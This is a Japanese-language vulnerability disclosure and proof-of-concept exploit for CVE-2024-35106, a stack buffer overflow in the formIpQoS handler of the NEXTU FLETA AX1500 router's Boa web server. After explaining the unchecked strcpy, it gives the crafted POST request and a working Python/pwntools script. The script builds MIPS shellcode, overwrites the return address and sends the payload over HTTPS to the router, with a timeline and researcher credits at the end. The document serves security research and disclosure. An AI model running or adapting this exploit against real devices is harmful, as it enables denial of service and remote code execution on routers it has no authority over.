
CVE-2024-35106の概念実証エクスプロイト。NEXTU FLETA AX1500 Wi-Fi 6ルーターのスタックバッファオーバーフロー。Boa WebサーバーのIP QoSハンドラーへの細工されたPOSTリクエストによるサービス拒否と潜在的なリモートコード実行を示します。
このドキュメントでは、CVE-2024-35106 の脆弱性を介して EZNET FLETA WiFI ルーター上でエクスプロイトを実行した方法について説明します。
[CVE ID] CVE-2024-35106
[製品ベンダー] NEXTU
[製品] FLATA AX1500 Wifi6 Router
[バージョン] 1.0.3
[脆弱性タイプ] バッファオーバーフロー
このルーターは、Realtek チップセットをベースとする MIPS アーキテクチャで動作し、リトルエンディアンを採用しています。
ルーターのファームウェアバージョンは v1.0.3 です。
このルーターは組み込み Web サーバーである Boa を使用しています。Boa の最終リリースは 2005 年です。しかし、このルーターは、ルーターのファームウェアを制御する管理用 Web ページサービスに Boa Web サーバーを利用しています。
この脆弱性をトリガーするために必要な条件は次のとおりです。
ルーターの管理用 Web 管理ページで内部 IP の QoS を設定する際、IP QoS ルール名のバイト長が検証されていないため、スタックバッファオーバーフローが発生します。
IP QoS 設定リクエストパラメータが Boa のハンドラ関数 formIpQoS に渡されると、ハンドラは entry_name パラメータのバイト長を取得し、strcpy() 関数を使用して acStack_1c0 変数にコピーします。

この関数では、バッファサイズを検証せずに strcpy 関数を使用してバッファをコピーします。

コピーされた entry_name パラメータのバイナリを格納する変数 acStack_1c0 は 16 バイトに固定されているため、コピーするデータのサイズを制限しない strcpy() 関数を使用すると、バッファオーバーフローが発生します。


攻撃ベクターの POST リクエストとパラメータは次のとおりです。
POST /boafrm/formIpQoS
BODY
enabled=ON&automaticUplinkSpeed=ON&automaticDownlinkSpeed=ON&addressType=0&ipversion=0&protocol=0&ipStart=192.168.1.5&ipEnd=192.168.1.5&localPortStart=1234&localPortEnd=1234&rmt_ipStart=&rmt_ipEnd=&rmt_portStart=&rmt_portEnd=&l7_protocol=Disable&mode=1&bandwidth=200&bandwidth_downlink=200&remark_dscp=&save_apply=%EC%A0%80%EC%9E%A5+%ED%9B%84+%EC%A0%81%EC%9A%A9&addQosFlag=1&lan_mask=255.255.255.0&submit-url=%2Fip_qos.htm&entry_name=[ADD ARBITRARY CODE AREA]
攻撃者は、任意のバイナリコードと任意のアドレスの 2 つを含むバイナリを準備し、POST リクエストの entry_name パラメータに設定します。
その結果、formIpQoS ハンドラのスタックアドレスメモリにある RET アドレスは、スタックオーバーフローによって任意のアドレスで上書きされます。
(0x7f8548cc は formIpQoS ハンドラのスタック RET アドレスです)
ただし、ハンドラ関数が正常に実行を完了する必要があるため、事前に 10 個の IP QoS ルールセットを保存しておく必要があります。

from pwn import *
from hackebds import *
def shutdown_shell_code():
context.update(arch='mips', os='linux', bits=32, endian='little')
cmd = "/bin/sh"
args = ["autoreboot"]
asmcode = shellcraft.mips.linux.execve(cmd, args, 0) + shellcraft.mips.linux.exit()
shellcode = asm(asmcode)
return shellcode
power_off_code = shutdown_shell_code()
gap_code = (b'A') * 0x138
# This is the area that overwrites the RET region. You can place the address to which you want to redirect the execution flow.
# For example I fixed address as 0x7f854710
RET_address = (b'\x10\x47\x85\x7f')
stack_gap = (b'C') * 0x40
print("power_off_code_length")
print(len(power_off_code))
final_code = power_off_code + gap_code + RET_address + stack_gap
import socket
import ssl
# Server Address and Port
HOST = '192.168.1.254'
PORT = 443
# Create an SSL socket for HTTPS connection
context = ssl.create_default_context()
context.set_ciphers('HIGH:!DH:!aNULL')
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with socket.create_connection((HOST, PORT)) as sock:
with context.wrap_socket(sock, server_hostname=HOST) as ssock:
# Prepare the shellcode as bytes (e.g., b'\x00\x01\x02'; replace with appropriate values for actual use)
# parameter for evade verification
send_byte = b"enabled=ON&automaticUplinkSpeed=ON&automaticDownlinkSpeed=ON&addressType=0&ipversion=0&protocol=0&ipStart=192.168.1.5&ipEnd=192.168.1.5&localPortStart=1234&localPortEnd=1234&rmt_ipStart=&rmt_ipEnd=&rmt_portStart=&rmt_portEnd=&l7_protocol=Disable&mode=1&bandwidth=200&bandwidth_downlink=200&remark_dscp=&save_apply=%EC%A0%80%EC%9E%A5+%ED%9B%84+%EC%A0%81%EC%9A%A9&addQosFlag=1&lan_mask=255.255.255.0&submit-url=%2Fip_qos.htm&entry_name=" + final_code
# POST request headers
headers = b"POST /boafrm/formIpQoS HTTP/1.1\r\n" \
b"Host: " + HOST.encode('utf-8') + b"\r\n" \
b"Content-Type: application/octet-stream\r\n" \
b"Content-Length: " + str(len(send_byte)).encode(
'utf-8') + b"\r\nConnection: close\r\n\r\n"
# Send request (combine headers and body)
ssock.send(headers + send_byte)
# Receive response
response = b""
while True:
data = ssock.recv(1024)
if not data:
break
response += data
#Print response
print(response.decode('utf-8'))
注意事項として、この脆弱性の POC を実行すると、確実に DoS が発生します。ただし、任意のリモートコード実行が発生するとは限りません。
この脆弱性は、DoS 攻撃や潜在的な RCE 攻撃に悪用される可能性があります。
2024-05-16: CVE 番号 CVE-2024-35106 を割り当て
2024-05-16: 脆弱性を製造元に報告
2024-06-05: 製造元から脆弱性に関する回答
Ku In Hoe
Assistant Prof. Seonghoon Jeong(淑明女子大学)